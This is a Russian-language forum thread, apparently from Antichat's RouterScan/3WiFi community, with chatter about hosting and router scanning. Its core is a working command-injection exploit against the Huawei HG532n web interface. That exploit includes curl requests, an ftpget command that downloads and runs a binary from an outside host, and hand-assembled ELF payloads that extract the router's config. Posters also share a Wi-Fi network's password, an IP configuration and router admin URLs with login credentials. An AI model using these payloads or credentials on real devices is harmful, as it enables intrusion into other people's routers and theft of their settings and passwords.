Мож скинуться всей братвой по соточке по двушке и продлить на 10 лет, 100-50 чел , как раз десятка. binarymaster отпишись если ты не против.
Страницы у меня тут на 4-5 раз грузятся, к эл. кошелькам доступ не получается осуществить. Вроде на рег.ру есть способ продлить домен просто зная его имя. С финансами проблем вроде нет, по приезду всё точно будет работать как прежде. Но если очень срочно, то я не против, я только за. Так как мне самому сейчас 3WiFi нужен.
Отбой ребята, я сразу не заметил, что можно и на 1 год проплатить, т.к никогда не оплачивал хостинги и невнимательно смотрел. Хостинг stascorp.com оплачен на один год (не буду говорить кем) но загадкой прискажу, человек выше "пользователя" на Античате, спасибо ему, ждем запуска 3wifi/
Вот может пригодится для добавление в Роутерскан - рут доступ к ТП -Линкам: http://seclists.org/fulldisclosure/2017/Feb/22
Использует ли роутер скан попытки залогиниться под стандартными логин/пассами или только сплоиты ищет?
88:E3:AB:E5:BF:90 MaKaNe 12345678910 Если интересно: Spoiler: Remote Command Execution within the HUAWEI HG532n Web Interface Веб-интерфейс HUAWEI HG532n не позволяет просматривать пароли, заменяя их строчкой «@1GV)Z<!». Когда известен пароль администратора, можно сделать бэкап настроек. Расшифровывается он скриптом для HG658c с соответствующими ключами (их я привёл в этом комментарии). Если пароль для admin поменяли, остаётся ещё user, однако он не имеет прав для скачивания файла настроек. Попробуем сделать инжект в команду ping, ибо в веб-интерфейсе видим её типичный вывод: Но увы: Что ж, посмотрим прошивку (я взял эту: https://routerunlock.com/download-huawei-hg532n-firmware-v100r001c105b016-free-egypt/). Binwalk без проблем извлекает файловую систему, и в файле /bin/web находим две ссылки на строчку StartTracePingCmd.cgi. В первой таблице перечислены права доступа (0 – без авторизации, 1 - user, 2 – admin, 3 – user | admin), а во второй ещё и обработчики: Примечательны две функции, напрямую вызывающие system(): excutecmdfordiagnose.cgi POST запрос к /html/management/excutecmdfordiagnose.cgi?cmd=…&RequestFile=… инжект параметра cmd в "ping %s -c 4 > /var/pingres.txt" excuteoamcmd.cgi POST запрос к /html/management/excuteoamcmd.cgi?pvc=…&RequestFile=… инжект параметра pvc в "atmcmd oam --start %s f5 --type segment --repetition 3 --timeout 1000 > /var/diagatm.txt" Пробуем: Авторизация (в данной версии отсылается SHA-256 хэш пароля): Code: curl 'http://IP/index/login.cgi' -H 'Cookie: Language=en' --data 'Username=user&Password=MDRmODk5NmRhNzYzYjdhOTY5YjEwMjhlZTMwMDc1NjllYWYzYTYzNTQ4NmRkYWIyMTFkNTEyYzg1YjlkZjhmYg%3D%3D' -i Инжект: Code: curl 'http://IP/html/management/excutecmdfordiagnose.cgi?cmd=;echo&RequestFile=/html/management/pingstatus.asp' -H 'Cookie: Language=en; SessionID_R3=123456789' --data '' В ответе видим результат выполнения ping ;echo -c 4: var PingResult = "-c 4\n" + ""; Теперь нужно извлечь требуемую информацию. Как это сделать с помощью имеющихся в прошивке утилит (adslcmd, atmcmd, atmcmdd, brctl, cli, cms, cwmp, ddnsc, dhcp6c, dhcp6s, dhcpc, dhcps, dns, ebtables, equipcmd, ethcmd, hw_nat, igmpproxy, ip, ip6tables, ipcheck, iptables, iwpriv, log, mic, mldproxy, pppc, radvd, radvdump, ripd, siproxd, sntp, swapdev, tc, tcci, tcwdog, telnetd, tr111, upg, upnp, web, wlancmd, wpsd, zebra, startbsp, busybox – arp, ash, cat, chmod, chown, cp, date, echo, ftpget, ftpput, halt, ifconfig, init, insmod, kill, killall, linuxrc, ln, ls, mkdir, mknod, mount, mv, netstat, pidof, ping, ping6, poweroff, ps, reboot, rm, rmmod, route, sh, sleep, test, top, traceroute, traceroute6, umount, vconfig, wget) я не нашёл. Поэтому скомпилируем свою. Т.к. в прошивке в качестве стандартной библиотеки C используется uClibc, берём toolchain отсюда. downloadconfigfile.conf вызывает ATP_CFM_ExtExportEncryptedCfgFile("/var/cfgtmp.cfg") из libcfmapi.so, которая в свою очередь обращается к ATP_DBExport("/var/curcfg.xml") и шифрует полученный файл. Компилируем: Code: // mips-linux-gcc dcfg.c -o dcfg -Os -lcfmapi extern int ATP_DBExport(char *name); int main() { return ATP_DBExport("/var/c"); } Загружаем программу на роутер через ftpget, выставляем права на исполнение, запускаем и выводим код возврата: Code: curl 'http://IP/html/management/excutecmdfordiagnose.cgi?cmd=;ftpget+-g+-u+anonymous+-l+/var/d+-r+/ftp_path/dcfg+ftp.yyyyy.xxx;chmod+777+/var/d;/var/d;echo+$%3F+&RequestFile=/html/management/pingstatus.asp' -H 'Cookie: Language=en; SessionID_R3=123456789' --data '' Программа возвращает 0x40010001 – как следует из листинга дизассемблера, это означает, что в libcfmapi не инициализирована глобальная переменная g_pvObjStAddr. Ещё порывшись в web, находим, что в main вызывается функция ATP_DBInit(8, 0): Code: // mips-linux-gcc dcfg.c -o dcfg -Os –lcfmapi extern int ATP_DBInit(int, int); extern int ATP_DBExport(char *name); int main() { ATP_DBInit(8,0); return ATP_DBExport("/var/c"); } Опять загружаем программу, выполняем, /var/c переименовываем в /var/pingres.txt и подчищаем за собой: Code: curl 'http://IP/html/management/excutecmdfordiagnose.cgi?cmd=;ftpget+-g+-u+anonymous+-l+/var/d+-r+/ftp_path/dcfg+ftp.yyyyy.xxx;chmod+777+/var/d;/var/d;mv+/var/c+/var/pingres.txt;rm+/var/d+||&RequestFile=/html/management/pingstatus.asp' -H 'Cookie: Language=en; SessionID_R3=123456789' --data '' Работает! – var PingResult = "<?xml version="1.0" ?>\n" + "<InternetGatewayDeviceConfig>..." Постараемся обойтись без ftp. Для этого минимизируем размер нашей программы, собрав её с опциями линковщика -nostdlib и -s: Code: // mips-linux-gcc dcfg.c -o dcfg -Os -nostdlib –lcfmapi -s extern int ATP_DBInit(int, int); extern int ATP_DBExport(char *name); int main() { ATP_DBInit(8,0); ATP_DBExport("/var/c"); __asm__ __volatile__( "li $v0, 10\n\t" "syscall"); } и удалив ненужные секции: Code: mips-linux-strip -R .mdebug.abi32 -R .gnu.attributes -R .pdr -R .comment dcfg Остальное доделаем вручную в hex-редакторе (пару полезных ссылок по структуре ELF: 1, 2). Итого: Spoiler: HEX dump Code: 00000000: 7F 45 4C 46-01 02 01 00-00 2F 76 61-72 2F 63 00 ELF /var/c 00000010: 00 02 00 08-00 00 00 01-00 40 01 F0-00 00 00 34 @ р 4 00000020: 00 00 00 00-70 00 10 07-00 34 00 20-00 05 00 00 p 4 00000030: 00 00 00 00-00 00 00 06-00 00 00 34-00 40 00 34 4 @ 4 00000040: 00 40 00 34-00 00 00 A0-00 00 00 A0-00 00 00 05 @ 4 00000050: 00 00 00 04-00 00 00 03-00 00 00 D4-00 40 00 D4 Ф @ Ф 00000060: 00 40 00 D4-00 00 00 14-00 00 00 14-00 00 00 04 @ Ф 00000070: 00 00 00 01-00 00 00 02-00 00 01 00-00 40 01 00 @ 00000080: 00 40 01 00-00 00 00 80-00 00 00 80-00 00 00 04 @ Ђ Ђ 00000090: 00 00 00 04-70 00 00 00-00 00 00 E8-00 40 00 E8 p и @ и 000000A0: 00 40 00 E8-00 00 00 18-00 00 00 18-00 00 00 04 @ и 000000B0: 00 00 00 04-00 00 00 01-00 00 00 00-00 40 00 00 @ 000000C0: 00 40 00 00-00 00 02 60-00 00 02 60-00 00 00 07 @ ` ` 000000D0: 00 01 00 00-2F 6C 69 62-2F 6C 64 2D-75 43 6C 69 /lib/ld-uCli 000000E0: 62 63 2E 73-6F 2E 30 00-B2 00 00 34-00 00 00 00 bc.so.0 І 4 000000F0: 00 00 00 00-00 00 00 00-00 00 00 00-00 40 82 40 @‚@ 00000100: 00 00 00 01-00 00 00 19-00 00 00 04-00 40 01 80 @ Ђ 00000110: 00 00 00 05-00 40 01 C8-00 00 00 06-00 40 01 98 @ И @ 00000120: 00 00 00 0A-00 00 00 26-00 00 00 0B-00 00 00 10 & 00000130: 70 00 00 16-00 40 02 2C-00 00 00 15-00 00 00 00 p @ , 00000140: 00 00 00 03-00 40 02 50-70 00 00 01-00 00 00 01 @ Pp 00000150: 70 00 00 05-00 00 00 02-70 00 00 06-00 40 00 00 p p @ 00000160: 70 00 00 0A-00 00 00 02-70 00 00 11-00 00 00 03 p p 00000170: 70 00 00 13-00 00 00 01-00 00 00 00-00 00 00 00 p 00000180: 00 00 00 01-00 00 00 03-00 00 00 01-00 00 00 00 00000190: 00 00 00 02-00 00 00 00-00 00 00 00-00 00 00 00 000001A0: 00 00 00 00-00 00 00 00-00 00 00 01-00 40 02 40 @ @ 000001B0: 00 00 00 00-12 00 00 00-00 00 00 0C-00 40 02 30 @ 0 000001C0: 00 00 00 00-12 00 00 00-00 41 54 50-5F 44 42 49 ATP_DBI 000001D0: 6E 69 74 00-41 54 50 5F-44 42 45 78-70 6F 72 74 nit ATP_DBExport 000001E0: 00 6C 69 62-63 66 6D 61-70 69 2E 73-6F 00 00 00 libcfmapi.so 000001F0: 3C 1C 00 41-27 BD FF FC-27 9C 82 40-00 00 28 25 < A'Ѕяь'њ‚@ (% 00000200: AF BC 00 00-8F 99 80 18-03 20 F8 09-24 04 00 08 Їј Џ™Ђ ш $ 00000210: 3C 04 00 40-8F BC 00 00-8F 99 80 1C-03 20 F8 09 < @Џј Џ™Ђ ш 00000220: 24 84 00 09-24 02 00 0A-00 00 00 0C-00 00 00 00 $„ $ 00000230: 8F 99 80 10-03 E0 78 25-03 20 F8 09-24 18 00 02 Џ™Ђ аx% ш $ 00000240: 8F 99 80 10-03 E0 78 25-03 20 F8 09-24 18 00 01 Џ™Ђ аx% ш $ 00000250: 00 00 00 00-80 00 00 00-00 40 02 40-00 40 02 30 Ђ @ @ @ 0 Spoiler: mips-linux-readelf -a dcfg Code: ELF Header: Magic: 7f 45 4c 46 01 02 01 00 00 2f 76 61 72 2f 63 00 Class: ELF32 Data: 2's complement, big endian Version: 1 (current) OS/ABI: UNIX - System V ABI Version: 0 Type: EXEC (Executable file) Machine: MIPS R3000 Version: 0x1 Entry point address: 0x4001f0 Start of program headers: 52 (bytes into file) Start of section headers: 0 (bytes into file) Flags: 0x70001007, noreorder, pic, cpic, o32, mips32r2 Size of this header: 52 (bytes) Size of program headers: 32 (bytes) Number of program headers: 5 Size of section headers: 0 (bytes) Number of section headers: 0 Section header string table index: 0 There are no sections in this file. There are no sections to group in this file. Program Headers: Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align PHDR 0x000034 0x00400034 0x00400034 0x000a0 0x000a0 R E 0x4 INTERP 0x0000d4 0x004000d4 0x004000d4 0x00014 0x00014 R 0x1 [Requesting program interpreter: /lib/ld-uClibc.so.0] DYNAMIC 0x000100 0x00400100 0x00400100 0x00080 0x00080 R 0x4 REGINFO 0x0000e8 0x004000e8 0x004000e8 0x00018 0x00018 R 0x4 LOAD 0x000000 0x00400000 0x00400000 0x00260 0x00260 RWE 0x10000 Dynamic section at offset 0x100 contains 16 entries: Tag Type Name/Value 0x00000001 (NEEDED) Shared library: [libcfmapi.so] 0x00000004 (HASH) 0x400180 0x00000005 (STRTAB) 0x4001c8 0x00000006 (SYMTAB) 0x400198 0x0000000a (STRSZ) 38 (bytes) 0x0000000b (SYMENT) 16 (bytes) 0x70000016 (MIPS_RLD_MAP) 0x40022c 0x00000015 (DEBUG) 0x0 0x00000003 (PLTGOT) 0x400250 0x70000001 (MIPS_RLD_VERSION) 1 0x70000005 (MIPS_FLAGS) NOTPOT 0x70000006 (MIPS_BASE_ADDRESS) 0x400000 0x7000000a (MIPS_LOCAL_GOTNO) 2 0x70000011 (MIPS_SYMTABNO) 3 0x70000013 (MIPS_GOTSYM) 0x1 0x00000000 (NULL) 0x0 There are no relocations in this file. The decoding of unwind sections for machine type MIPS R3000 is not currently supported. Dynamic symbol information is not available for displaying symbols. Histogram for bucket list length (total of 1 buckets): Length Number % of total Coverage 0 1 (100.0%) No version information found in this file. Primary GOT: Canonical gp value: 00408240 Reserved entries: Address Access Initial Purpose 00400250 -32752(gp) 00000000 Lazy resolver 00400254 -32748(gp) 80000000 Module pointer (GNU extension) Global entries: Address Access Initial Sym.Val. Type Ndx Name 00400258 -32744(gp) 00400240 00400240 FUNC UND ATP_DBInit 0040025c -32740(gp) 00400230 00400230 FUNC UND ATP_DBExport Одним запросом обойтись не получиться (snprintf обрезает команду до 1024 символов), а echo урезанный, поэтому программу придётся разбивать по знаку переноса строки (0x0A): Code: curl 'http://IP/html/management/excutecmdfordiagnose.cgi?cmd=;echo+"\x7fELF\x01\x02\x01\x00\x00/var/c\x00\x00\x02\x00\b\x00\x00\x00\x01\x00@\x01\xf0\x00\x00\x004\x00\x00\x00\x00p\x00\x10\x07\x004\x00+\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x004\x00@\x004\x00@\x004\x00\x00\x00\xa0\x00\x00\x00\xa0\x00\x00\x00\x05\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x00\xd4\x00@\x00\xd4\x00@\x00\xd4\x00\x00\x00\x14\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x01\x00\x00@\x01\x00\x00@\x01\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x04\x00\x00\x00\x04p\x00\x00\x00\x00\x00\x00\xe8\x00@\x00\xe8\x00@\x00\xe8\x00\x00\x00\x18\x00\x00\x00\x18\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x00\x00@\x00\x00\x00@\x00\x00\x00\x00\x02\x60\x00\x00\x02\x60\x00\x00\x00\x07\x00\x01\x00\x00/lib/ld-uClibc.so.0\x00\xb2\x00\x004\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x82@\x00\x00\x00\x01\x00\x00\x00\x19\x00\x00\x00\x04\x00@\x01\x80\x00\x00\x00\x05\x00@\x01\xc8\x00\x00\x00\x06\x00@\x01\x98\x00\x00\x00">/var/d;&RequestFile=/html/management/pingstatus.asp' -H 'Cookie: Language=en; SessionID_R3=123456789' --data '' curl 'http://IP/html/management/excutecmdfordiagnose.cgi?cmd=;echo+"\x00\x00\x00\x26\x00\x00\x00\v\x00\x00\x00\x10p\x00\x00\x16\x00@\x02,\x00\x00\x00\x15\x00\x00\x00\x00\x00\x00\x00\x03\x00@\x02Pp\x00\x00\x01\x00\x00\x00\x01p\x00\x00\x05\x00\x00\x00\x02p\x00\x00\x06\x00@\x00\x00p\x00\x00\n\x00\x00\x00\x02p\x00\x00\x11\x00\x00\x00\x03p\x00\x00\x13\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00@\x02@\x00\x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\f\x00@\x020\x00\x00\x00\x00\x12\x00\x00\x00\x00ATP_DBInit\x00ATP_DBExport\x00libcfmapi.so\x00\x00\x00\x3c\x1c\x00A\x27\xbd\xff\xfc\x27\x9c\x82@\x00\x00(\x25\xaf\xbc\x00\x00\x8f\x99\x80\x18\x03+\xf8\t$\x04\x00\b\x3c\x04\x00@\x8f\xbc\x00\x00\x8f\x99\x80\x1c\x03+\xf8\t$\x84\x00\t$\x02\x00">>/var/d;&RequestFile=/html/management/pingstatus.asp' -H 'Cookie: Language=en; SessionID_R3=123456789' --data '' curl 'http://IP/html/management/excutecmdfordiagnose.cgi?cmd=;echo+"\x00\x00\x00\f\x00\x00\x00\x00\x8f\x99\x80\x10\x03\xe0x\x25\x03+\xf8\t$\x18\x00\x02\x8f\x99\x80\x10\x03\xe0x\x25\x03+\xf8\t$\x18\x00\x01\x00\x00\x00\x00\x80\x00\x00\x00\x00@\x02@\x00@\x020">>/var/d;chmod+777+/var/d;/var/d;mv+/var/c+/var/pingres.txt;rm+/var/d+||&RequestFile=/html/management/pingstatus.asp' -H 'Cookie: Language=en; SessionID_R3=123456789' --data ''
IP-адрес 176.214.234.101 Маска подсети 255.255.255.255 Шлюз 10.92.127.126 DNS 1 109.194.160.1 DNS 2 5.3.3.3
а собсна в чем проблема? Spoiler: Х http://admin:[email protected]:81 http://admin:[email protected]:81 http://admin:[email protected]:81 http://admin:[email protected]:8080 это так, на вскидку
Eltex Не видит некоторые роутеры есть апи диапозон один а роутер невидит сканю со своего один провайдер ростелеком
